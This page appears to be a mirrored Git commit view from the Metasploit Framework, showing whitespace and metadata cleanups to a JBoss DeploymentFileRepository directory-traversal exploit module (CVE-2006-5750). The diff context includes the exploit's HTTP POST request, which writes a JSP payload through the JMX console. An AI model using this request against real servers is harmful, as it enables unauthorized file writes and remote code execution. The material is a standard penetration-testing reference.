infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

minor cleanups 

git-svn-id: file:///home/svn/framework3/trunk@9245 4d416f70-5f16-0410-b530-b9f4589650da
unstable
Joshua Drake 2010-05-07 22:28:21 +00:00
parent 579d35035b
commit d296e0cdc3
1 changed files with 11 additions and 7 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

18
modules/exploits/multi/http/jboss_deploymentfilerepository.rb
View File

@ -1,3 +1,7 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
@ -17,18 +21,18 @@ class Metasploit3 < Msf::Exploit::Remote
super(update_info(info,
'Name' => 'JBoss Java Class DeploymentFileRepository Directory Traversal',
'Description' => %q{
This module exploits a directory traversal vulnerability in the DeploymentFileRepository
This module exploits a directory traversal vulnerability in the DeploymentFileRepository
class in JBoss Application Server (jbossas) 3.2.4 through 4.0.5. This vulnerability
allows remote authenticated (and unathenticated) users to read or modify arbitrary files, and possibly execute
arbitrary code.
allows remote authenticated (and unathenticated) users to read or modify arbitrary files,
and possibly execute arbitrary code.
},
'Author' => [ 'MC' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: $',
'Version' => '$Revision$',
'References' =>
[
[ 'CVE', '2006-5750' ],
[ 'BID', '21219' ],
[ 'BID', '21219' ]
],
'Privileged' => false,
'Platform' => [ 'linux' ],
@ -39,7 +43,7 @@ class Metasploit3 < Msf::Exploit::Remote
'Arch' => ARCH_JAVA,
'Payload' =>
{
'DisableNops' => true,
'DisableNops' => true,
},
}
],
@ -65,7 +69,7 @@ class Metasploit3 < Msf::Exploit::Remote
'uri' => '/jmx-console/HtmlAdaptor',
'method' => 'POST',
'data' => 'action=invokeOp&name=jboss.admin%3Aservice%3DDeploymentFileRepository&methodIndex=5&arg0=' +
Rex::Text.uri_encode(datastore['PATH']) + '&arg1=' + fname + '&arg2=.jsp&arg3=' +
Rex::Text.uri_encode(datastore['PATH']) + '&arg1=' + fname + '&arg2=.jsp&arg3=' +
Rex::Text.uri_encode(payload.encoded) + '&arg4=True',
})